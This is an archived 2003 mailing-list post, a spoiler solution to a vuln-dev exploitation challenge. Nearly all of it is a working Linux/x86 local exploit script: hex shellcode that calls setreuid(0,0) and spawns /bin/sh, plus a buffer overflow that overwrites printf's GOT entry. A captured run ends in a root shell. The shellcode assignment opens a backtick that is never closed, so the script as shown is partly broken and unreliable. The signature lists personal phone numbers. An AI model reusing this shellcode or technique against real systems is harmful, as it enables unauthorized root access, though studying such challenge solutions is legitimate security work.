Hosting Provided By

Re: [Vuln-dev Challenge] Challenge #2 (SPOILER)

From: Joel Eriksson <je-vulndev(at)bitnux.com>
Date: Fri May 23 2003 - 20:11:33 EDT

[je@vudo ~]$ cat>expldev-2.sh<<EOF
#!/bin/bash
#
# Linux/x86 exploit for vulndev-2
#
# Defeats non-executable stack / heap & randomized stack base
#
# 2003-05-23 - Joel Eriksson (je at 0xbadc0ded.org)
#

shellcode=`

        # setreuid(0, 0)
        printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
        # execve("/bin/sh", "/bin/sh", NULL)
        printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
        printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

buf_size=90     # size of buffer
pad_size=2      # align to word boundary
num_reps=32     # &bfp - buf may be > BFSIZE (padding/alignment)

addr=0x$(objdump -R vulndev-2 | awk '$3 == "printf" { print $1 }')

arg1=$(perl -e 'print "A"x('$buf_size+$pad_size') . pack("L", '$[addr-2]')x'$num_reps) arg2=$(perl -e 'print pack("L", '$[addr+4]')')$shellcode

rm -f db.log ; ./vulndev-2 $arg1 $arg2

exit 0
EOF
[je@vudo ~]$ ./expldev-2.sh
sh-2.05b# whoami
root
sh-2.05b#

-- 
Joel Eriksson 
-------------------------------------------------
Cellphone: +46-70-288 64 16 Home: +46-26-10 23 37
Security Research & Systems Development at Bitnux
PGP Key Server pgp.mit.edu, PGP Key ID 0x529FDBD1
A615 A1E1 3CA2 D7C2 CFEA 47B4 7EF7 E6B2 529F DBD1
-------------------------------------------------

Received on Sat May 24 17:04:55 2003

This message: [ Message body ]
Next message: Jason_Royes: "Re: [Vuln-dev Challenge] Challenge #2"
Previous message: Steven Hill: "[Vuln-dev Challenge]: Symlink Attack"
In reply to: Dave McKinney: "[Vuln-dev Challenge] Challenge #2"
Next in thread: Joel Eriksson: "Re: [Vuln-dev Challenge] Challenge #2 (SPOILER)"
Reply: Joel Eriksson: "Re: [Vuln-dev Challenge] Challenge #2 (SPOILER)"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT